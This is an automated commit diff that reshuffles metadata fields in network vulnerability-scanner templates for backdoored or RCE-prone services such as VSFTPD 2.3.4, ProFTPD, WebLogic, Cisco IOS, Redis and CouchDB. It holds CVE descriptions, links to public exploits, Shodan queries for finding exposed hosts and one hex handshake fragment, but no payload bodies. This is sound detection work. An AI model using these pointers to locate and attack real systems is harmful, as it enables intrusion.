TemplateMan Update [Wed Sep 27 13:29:58 UTC 2023] 🤖

patch-1
GitHub Action 2023-09-27 13:29:58 +00:00
parent 9cbcb77b26
commit 627e654d30
91 changed files with 234 additions and 254 deletions

View File

@ -10,12 +10,12 @@ info:
- https://www.exploit-db.com/ghdb/7179 - https://www.exploit-db.com/ghdb/7179
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0 cvss-score: 10
cwe-id: CWE-912 cwe-id: CWE-912
metadata: metadata:
max-request: 2 max-request: 1
verified: true
shodan-query: http.html:"ZTE Corporation" shodan-query: http.html:"ZTE Corporation"
verified: true
tags: edb,network,zte,telnet,backdoor,router tags: edb,network,zte,telnet,backdoor,router
tcp: tcp:

View File

@ -7,14 +7,14 @@ info:
description: VSFTPD 2.3.4 contains a backdoor command execution vulnerability. description: VSFTPD 2.3.4 contains a backdoor command execution vulnerability.
reference: reference:
- https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/ - https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/
remediation: This backdoor was removed on July 3rd, 2011.
classification: classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0 cvss-score: 10
cwe-id: CWE-78 cwe-id: CWE-78
remediation: This backdoor was removed on July 3rd, 2011.
tags: network,vsftpd,ftp,backdoor
metadata: metadata:
max-request: 2 max-request: 1
tags: network,vsftpd,ftp,backdoor
tcp: tcp:
- inputs: - inputs:

View File

@ -5,23 +5,23 @@ info:
author: iamthefrogy author: iamthefrogy
severity: high severity: high
description: SSHv1 is deprecated and has known cryptographic issues. description: SSHv1 is deprecated and has known cryptographic issues.
remediation: Upgrade to SSH 2.4 or later.
reference: reference:
- https://www.kb.cert.org/vuls/id/684820 - https://www.kb.cert.org/vuls/id/684820
- https://nvd.nist.gov/vuln/detail/CVE-2001-1473 - https://nvd.nist.gov/vuln/detail/CVE-2001-1473
- http://www.kb.cert.org/vuls/id/684820 - http://www.kb.cert.org/vuls/id/684820
- https://exchange.xforce.ibmcloud.com/vulnerabilities/6603 - https://exchange.xforce.ibmcloud.com/vulnerabilities/6603
remediation: Upgrade to SSH 2.4 or later.
classification: classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5 cvss-score: 7.5
cve-id: CVE-2001-1473 cve-id: CVE-2001-1473
cwe-id: CWE-310 cwe-id: CWE-310
epss-score: 0.00258
cpe: cpe:2.3:a:ssh:ssh:1.2.24:*:*:*:*:*:*:* cpe: cpe:2.3:a:ssh:ssh:1.2.24:*:*:*:*:*:*:*
epss-score: 0.00258
metadata: metadata:
max-request: 2 max-request: 1
vendor: ssh
product: ssh product: ssh
vendor: ssh
tags: cve,cve2001,network,ssh,openssh tags: cve,cve2001,network,ssh,openssh
tcp: tcp:
- host: - host:

View File

@ -5,24 +5,24 @@ info:
author: pdteam author: pdteam
severity: critical severity: critical
description: ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands. description: ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.
remediation: Upgrade to ProFTPD 1.3.5a / 1.3.6rc1 or later.
reference: reference:
- https://github.com/t0kx/exploit-CVE-2015-3306 - https://github.com/t0kx/exploit-CVE-2015-3306
- https://www.exploit-db.com/exploits/36803/ - https://www.exploit-db.com/exploits/36803/
- http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157053.html - http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157053.html
- http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157054.html - http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157054.html
- https://nvd.nist.gov/vuln/detail/CVE-2015-3306 - https://nvd.nist.gov/vuln/detail/CVE-2015-3306
remediation: Upgrade to ProFTPD 1.3.5a / 1.3.6rc1 or later.
classification: classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
cvss-score: 10 cvss-score: 10
cve-id: CVE-2015-3306 cve-id: CVE-2015-3306
cwe-id: CWE-284 cwe-id: CWE-284
epss-score: 0.97267
cpe: cpe:2.3:a:proftpd:proftpd:1.3.5:*:*:*:*:*:*:* cpe: cpe:2.3:a:proftpd:proftpd:1.3.5:*:*:*:*:*:*:*
epss-score: 0.97267
metadata: metadata:
max-request: 2 max-request: 1
vendor: proftpd
product: proftpd product: proftpd
vendor: proftpd
tags: cve,cve2015,ftp,rce,network,proftpd,edb tags: cve,cve2015,ftp,rce,network,proftpd,edb
tcp: tcp:
- host: - host:

View File

@ -5,25 +5,25 @@ info:
author: pussycat0x author: pussycat0x
severity: critical severity: critical
description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623. description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
remediation: |
Upgrade to the most recent version of HP Data Protector.
reference: reference:
- https://www.exploit-db.com/exploits/39858 - https://www.exploit-db.com/exploits/39858
- https://nvd.nist.gov/vuln/detail/CVE-2016-2004 - https://nvd.nist.gov/vuln/detail/CVE-2016-2004
- http://www.kb.cert.org/vuls/id/267328 - http://www.kb.cert.org/vuls/id/267328
- https://www.exploit-db.com/exploits/39858/ - https://www.exploit-db.com/exploits/39858/
- http://packetstormsecurity.com/files/137199/HP-Data-Protector-A.09.00-Command-Execution.html - http://packetstormsecurity.com/files/137199/HP-Data-Protector-A.09.00-Command-Execution.html
remediation: |
Upgrade to the most recent version of HP Data Protector.
classification: classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8 cvss-score: 9.8
cve-id: CVE-2016-2004 cve-id: CVE-2016-2004
cwe-id: CWE-306 cwe-id: CWE-306
epss-score: 0.06793
cpe: cpe:2.3:a:hp:data_protector:*:*:*:*:*:*:*:* cpe: cpe:2.3:a:hp:data_protector:*:*:*:*:*:*:*:*
epss-score: 0.06793
metadata: metadata:
max-request: 2 max-request: 1
vendor: hp
product: data_protector product: data_protector
vendor: hp
tags: cve,cve2016,network,iot,hp,rce,edb tags: cve,cve2016,network,iot,hp,rce,edb
tcp: tcp:
- host: - host:

View File

@ -15,9 +15,9 @@ info:
cvss-score: 9.8 cvss-score: 9.8
cve-id: CVE-2016-3510 cve-id: CVE-2016-3510
cwe-id: CWE-119 cwe-id: CWE-119
epss-score: 0.0162000000 epss-score: 0.0162
metadata: metadata:
max-request: 2 max-request: 1
verified: true verified: true
tags: cve,cve2016,weblogic,t3,rce,oast,deserialization,network tags: cve,cve2016,weblogic,t3,rce,oast,deserialization,network

View File

@ -6,24 +6,24 @@ info:
severity: critical severity: critical
description: | description: |
A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges. The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors: (1) the failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device; and (2) the incorrect processing of malformed CMP-specific Telnet options. An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device. This affects Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2 EtherSwitch Service Module, Enhanced Layer 2/3 EtherSwitch Service Module, Gigabit Ethernet Switch Module (CGESM) for HP, IE Industrial Ethernet switches, ME 4924-10GE switch, RF Gateway 10, and SM-X Layer 2/3 EtherSwitch Service Module. Cisco Bug IDs: CSCvd48893. A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges. The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors: (1) the failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device; and (2) the incorrect processing of malformed CMP-specific Telnet options. An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device. This affects Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2 EtherSwitch Service Module, Enhanced Layer 2/3 EtherSwitch Service Module, Gigabit Ethernet Switch Module (CGESM) for HP, IE Industrial Ethernet switches, ME 4924-10GE switch, RF Gateway 10, and SM-X Layer 2/3 EtherSwitch Service Module. Cisco Bug IDs: CSCvd48893.
remediation: Deactivate a telnet connection or employ Access Control Lists (ACLs) to limit access.
reference: reference:
- https://github.com/artkond/cisco-rce - https://github.com/artkond/cisco-rce
- https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/ - https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/
- https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/dos/cisco/ios_telnet_rocem.md - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/dos/cisco/ios_telnet_rocem.md
- https://nvd.nist.gov/vuln/detail/CVE-2017-3881 - https://nvd.nist.gov/vuln/detail/CVE-2017-3881
- http://www.securitytracker.com/id/1038059 - http://www.securitytracker.com/id/1038059
remediation: Deactivate a telnet connection or employ Access Control Lists (ACLs) to limit access.
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8 cvss-score: 9.8
cve-id: CVE-2017-3881 cve-id: CVE-2017-3881
cwe-id: CWE-20 cwe-id: CWE-20
epss-score: 0.97332
cpe: cpe:2.3:o:cisco:ios:*:*:*:*:*:*:*:* cpe: cpe:2.3:o:cisco:ios:*:*:*:*:*:*:*:*
epss-score: 0.97332
metadata: metadata:
max-request: 2 max-request: 1
vendor: cisco
product: ios product: ios
vendor: cisco
tags: cve,cve2017,cisco,rce,network,kev,msf tags: cve,cve2017,cisco,rce,network,kev,msf
tcp: tcp:
- host: - host:

View File

@ -6,25 +6,25 @@ info:
severity: critical severity: critical
description: | description: |
In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code. In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.
remediation: |
Consider updating to Log4j 2.15.0 or a newer version, deactivating JNDI lookups, or implementing a Java Agent to safeguard against potentially harmful JNDI lookups.
reference: reference:
- https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2017-5645 - https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2017-5645
- https://nvd.nist.gov/vuln/detail/CVE-2017-5645 - https://nvd.nist.gov/vuln/detail/CVE-2017-5645
- http://www.openwall.com/lists/oss-security/2019/12/19/2 - http://www.openwall.com/lists/oss-security/2019/12/19/2
- http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html - http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
- http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html - http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html
remediation: |
Consider updating to Log4j 2.15.0 or a newer version, deactivating JNDI lookups, or implementing a Java Agent to safeguard against potentially harmful JNDI lookups.
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8 cvss-score: 9.8
cve-id: CVE-2017-5645 cve-id: CVE-2017-5645
cwe-id: CWE-502 cwe-id: CWE-502
epss-score: 0.74805
cpe: cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:* cpe: cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*
epss-score: 0.74805
metadata: metadata:
max-request: 2 max-request: 1
vendor: apache
product: log4j product: log4j
vendor: apache
tags: cve,cve2017,vulhub,network,apache,log4j,rce,deserialization,oast, tags: cve,cve2017,vulhub,network,apache,log4j,rce,deserialization,oast,
variables: variables:
end: "\r\n" end: "\r\n"

View File

@ -16,9 +16,9 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8 cvss-score: 9.8
cve-id: CVE-2018-2893 cve-id: CVE-2018-2893
epss-score: 0.973460000 epss-score: 0.97346
metadata: metadata:
max-request: 2 max-request: 1
tags: cve,cve2018,weblogic,network,deserialization,rce,oracle tags: cve,cve2018,weblogic,network,deserialization,rce,oracle
tcp: tcp:

View File

@ -15,9 +15,9 @@ info:
cvss-score: 9.8 cvss-score: 9.8
cve-id: CVE-2020-11981 cve-id: CVE-2020-11981
cwe-id: CWE-78 cwe-id: CWE-78
epss-score: 0.936930000 epss-score: 0.93693
metadata: metadata:
max-request: 2 max-request: 1
shodan-query: product:"redis" shodan-query: product:"redis"
verified: true verified: true
tags: cve,cve2020,network,redis,unauth,apache,airflow,vulhub,intrusive tags: cve,cve2020,network,redis,unauth,apache,airflow,vulhub,intrusive

View File

@ -5,25 +5,25 @@ info:
author: milo2012 author: milo2012
severity: critical severity: critical
description: When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations. description: When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.
remediation: https://access.redhat.com/solutions/4851251
reference: reference:
- https://www.tenable.com/blog/cve-2020-1938-ghostcat-apache-tomcat-ajp-file-readinclusion-vulnerability-cnvd-2020-10487 - https://www.tenable.com/blog/cve-2020-1938-ghostcat-apache-tomcat-ajp-file-readinclusion-vulnerability-cnvd-2020-10487
- https://nvd.nist.gov/vuln/detail/CVE-2020-1938 - https://nvd.nist.gov/vuln/detail/CVE-2020-1938
- https://lists.apache.org/thread.html/r7c6f492fbd39af34a68681dbbba0468490ff1a97a1bd79c6a53610ef%40%3Cannounce.tomcat.apache.org%3E - https://lists.apache.org/thread.html/r7c6f492fbd39af34a68681dbbba0468490ff1a97a1bd79c6a53610ef%40%3Cannounce.tomcat.apache.org%3E
- https://lists.apache.org/thread.html/r75113652e46c4dee687236510649acfb70d2c63e074152049c3f399d@%3Cnotifications.ofbiz.apache.org%3E - https://lists.apache.org/thread.html/r75113652e46c4dee687236510649acfb70d2c63e074152049c3f399d@%3Cnotifications.ofbiz.apache.org%3E
- http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00025.html - http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00025.html
remediation: https://access.redhat.com/solutions/4851251
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8 cvss-score: 9.8
cve-id: CVE-2020-1938 cve-id: CVE-2020-1938
cwe-id: CWE-269 cwe-id: CWE-269
epss-score: 0.97486
cpe: cpe:2.3:a:apache:geode:1.12.0:*:*:*:*:*:*:* cpe: cpe:2.3:a:apache:geode:1.12.0:*:*:*:*:*:*:*
epss-score: 0.97486
metadata: metadata:
max-request: 4 max-request: 1
vendor: apache
product: geode product: geode
shodan-query: title:"Apache Tomcat" shodan-query: title:"Apache Tomcat"
vendor: apache
tags: cve,cve2020,kev,tenable,apache,lfi,network,tomcat tags: cve,cve2020,kev,tenable,apache,lfi,network,tomcat
tcp: tcp:
- host: - host:

View File

@ -6,24 +6,24 @@ info:
severity: critical severity: critical
description: | description: |
OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an incorrect return value upon failure of input validation. OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an incorrect return value upon failure of input validation.
remediation: OpenBSD users are recommended to install patches for OpenBSD 6.6
reference: reference:
- https://www.openwall.com/lists/oss-security/2020/01/28/3 - https://www.openwall.com/lists/oss-security/2020/01/28/3
- https://nvd.nist.gov/vuln/detail/CVE-2020-7247 - https://nvd.nist.gov/vuln/detail/CVE-2020-7247
- https://github.com/openbsd/src/commit/9dcfda045474d8903224d175907bfc29761dcb45 - https://github.com/openbsd/src/commit/9dcfda045474d8903224d175907bfc29761dcb45
- http://www.openwall.com/lists/oss-security/2020/01/28/3 - http://www.openwall.com/lists/oss-security/2020/01/28/3
- http://packetstormsecurity.com/files/156145/OpenSMTPD-6.6.2-Remote-Code-Execution.html - http://packetstormsecurity.com/files/156145/OpenSMTPD-6.6.2-Remote-Code-Execution.html
remediation: OpenBSD users are recommended to install patches for OpenBSD 6.6
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8 cvss-score: 9.8
cve-id: CVE-2020-7247 cve-id: CVE-2020-7247
cwe-id: CWE-755 cwe-id: CWE-755
epss-score: 0.9749
cpe: cpe:2.3:a:openbsd:opensmtpd:6.6:*:*:*:*:*:*:* cpe: cpe:2.3:a:openbsd:opensmtpd:6.6:*:*:*:*:*:*:*
epss-score: 0.9749
metadata: metadata:
max-request: 2 max-request: 1
vendor: openbsd
product: opensmtpd product: opensmtpd
vendor: openbsd
tags: cve,cve2020,smtp,opensmtpd,network,rce,oast,kev tags: cve,cve2020,smtp,opensmtpd,network,rce,oast,kev
tcp: tcp:
- host: - host:

View File

@ -5,7 +5,6 @@ info:
author: Y4er author: Y4er
severity: critical severity: critical
description: 'When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.' description: 'When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.'
remediation: 3.0.x users should upgrade to 3.0.26, 3.11.x users should upgrade to 3.11.12, 4.0.x users should upgrade to 4.0.2
reference: reference:
- https://y4er.com/post/cve-2021-44521-apache-cassandra-udf-rce/ - https://y4er.com/post/cve-2021-44521-apache-cassandra-udf-rce/
- https://nvd.nist.gov/vuln/detail/CVE-2021-44521 - https://nvd.nist.gov/vuln/detail/CVE-2021-44521
@ -13,17 +12,18 @@ info:
- https://lists.apache.org/thread/y4nb9s4co34j8hdfmrshyl09lokm7356 - https://lists.apache.org/thread/y4nb9s4co34j8hdfmrshyl09lokm7356
- http://www.openwall.com/lists/oss-security/2022/02/11/4 - http://www.openwall.com/lists/oss-security/2022/02/11/4
- https://thesecmaster.com/how-to-fix-apache-cassandra-rce-vulnerability-cve-2021-44521/ - https://thesecmaster.com/how-to-fix-apache-cassandra-rce-vulnerability-cve-2021-44521/
remediation: 3.0.x users should upgrade to 3.0.26, 3.11.x users should upgrade to 3.11.12, 4.0.x users should upgrade to 4.0.2
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.1 cvss-score: 9.1
cve-id: CVE-2021-44521 cve-id: CVE-2021-44521
cwe-id: CWE-732,CWE-94 cwe-id: CWE-732,CWE-94
epss-score: 0.01212
cpe: cpe:2.3:a:apache:cassandra:*:*:*:*:*:*:*:* cpe: cpe:2.3:a:apache:cassandra:*:*:*:*:*:*:*:*
epss-score: 0.01212
metadata: metadata:
max-request: 2 max-request: 1
vendor: apache
product: cassandra product: cassandra
vendor: apache
tags: cve,cve2021,network,rce,apache,cassandra tags: cve,cve2021,network,rce,apache,cassandra
tcp: tcp:
- host: - host:

View File

@ -9,24 +9,24 @@ info:
vulnerability was introduced by Debian and Ubuntu Redis packages that vulnerability was introduced by Debian and Ubuntu Redis packages that
insufficiently sanitized the Lua environment. The maintainers failed to insufficiently sanitized the Lua environment. The maintainers failed to
disable the package interface, allowing attackers to load arbitrary libraries. disable the package interface, allowing attackers to load arbitrary libraries.
remediation: Update to the most recent versions currently available.
reference: reference:
- https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce - https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce
- https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis - https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis
- https://bugs.debian.org/1005787 - https://bugs.debian.org/1005787
- https://www.debian.org/security/2022/dsa-5081 - https://www.debian.org/security/2022/dsa-5081
- https://lists.debian.org/debian-security-announce/2022/msg00048.html - https://lists.debian.org/debian-security-announce/2022/msg00048.html
remediation: Update to the most recent versions currently available.
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10 cvss-score: 10
cve-id: CVE-2022-0543 cve-id: CVE-2022-0543
epss-score: 0.97184
cpe: cpe:2.3:a:redis:redis:-:*:*:*:*:*:*:* cpe: cpe:2.3:a:redis:redis:-:*:*:*:*:*:*:*
epss-score: 0.97184
metadata: metadata:
max-request: 4 max-request: 1
vendor: redis
product: redis product: redis
shodan-query: redis_version shodan-query: redis_version
vendor: redis
tags: cve,cve2022,network,redis,unauth,rce,kev tags: cve,cve2022,network,redis,unauth,rce,kev
tcp: tcp:
- host: - host:

View File

@ -6,27 +6,27 @@ info:
severity: critical severity: critical
description: | description: |
In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges. In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.
remediation: |
Upgrade to versions 3.2.2 or newer. Starting from CouchDB 3.2.2, the previous default Erlang cookie value "monster" will be rejected upon startup. Upgraded installations will be required to select an alternative value.
reference: reference:
- https://www.exploit-db.com/exploits/50914 - https://www.exploit-db.com/exploits/50914
- https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit/blob/main/CVE-2022-24706-Exploit.py - https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit/blob/main/CVE-2022-24706-Exploit.py
- https://nvd.nist.gov/vuln/detail/CVE-2022-24706 - https://nvd.nist.gov/vuln/detail/CVE-2022-24706
- http://www.openwall.com/lists/oss-security/2022/04/26/1 - http://www.openwall.com/lists/oss-security/2022/04/26/1
- http://www.openwall.com/lists/oss-security/2022/05/09/1 - http://www.openwall.com/lists/oss-security/2022/05/09/1
remediation: |
Upgrade to versions 3.2.2 or newer. Starting from CouchDB 3.2.2, the previous default Erlang cookie value "monster" will be rejected upon startup. Upgraded installations will be required to select an alternative value.
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8 cvss-score: 9.8
cve-id: CVE-2022-24706 cve-id: CVE-2022-24706
cwe-id: CWE-1188 cwe-id: CWE-1188
epss-score: 0.97407
cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:* cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:*
epss-score: 0.97407
metadata: metadata:
verified: "true" max-request: 1
max-request: 2
vendor: apache
product: couchdb product: couchdb
shodan-query: product:"CouchDB" shodan-query: product:"CouchDB"
vendor: apache
verified: "true"
tags: cve,cve2022,network,couch,rce,kev tags: cve,cve2022,network,couch,rce,kev
variables: variables:
name_msg: "00156e00050007499c4141414141414041414141414141" name_msg: "00156e00050007499c4141414141414041414141414141"

View File

@ -6,27 +6,27 @@ info:
severity: critical severity: critical
description: | description: |
For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution. Several components of RocketMQ, including NameServer, Broker, and Controller, are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content. To prevent these attacks, users are recommended to upgrade to version 5.1.1 or above for using RocketMQ 5.x or 4.9.6 or above for using RocketMQ 4.x . For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution. Several components of RocketMQ, including NameServer, Broker, and Controller, are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content. To prevent these attacks, users are recommended to upgrade to version 5.1.1 or above for using RocketMQ 5.x or 4.9.6 or above for using RocketMQ 4.x .
remediation: Update the RocketMQ application to version 5.1.1
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-33246 - https://nvd.nist.gov/vuln/detail/CVE-2023-33246
- https://github.com/I5N0rth/CVE-2023-33246 - https://github.com/I5N0rth/CVE-2023-33246
- http://packetstormsecurity.com/files/173339/Apache-RocketMQ-5.1.0-Arbitrary-Code-Injection.html - http://packetstormsecurity.com/files/173339/Apache-RocketMQ-5.1.0-Arbitrary-Code-Injection.html
- http://www.openwall.com/lists/oss-security/2023/07/12/1 - http://www.openwall.com/lists/oss-security/2023/07/12/1
- https://lists.apache.org/thread/1s8j2c8kogthtpv3060yddk03zq0pxyp - https://lists.apache.org/thread/1s8j2c8kogthtpv3060yddk03zq0pxyp
remediation: Update the RocketMQ application to version 5.1.1
classification: classification:
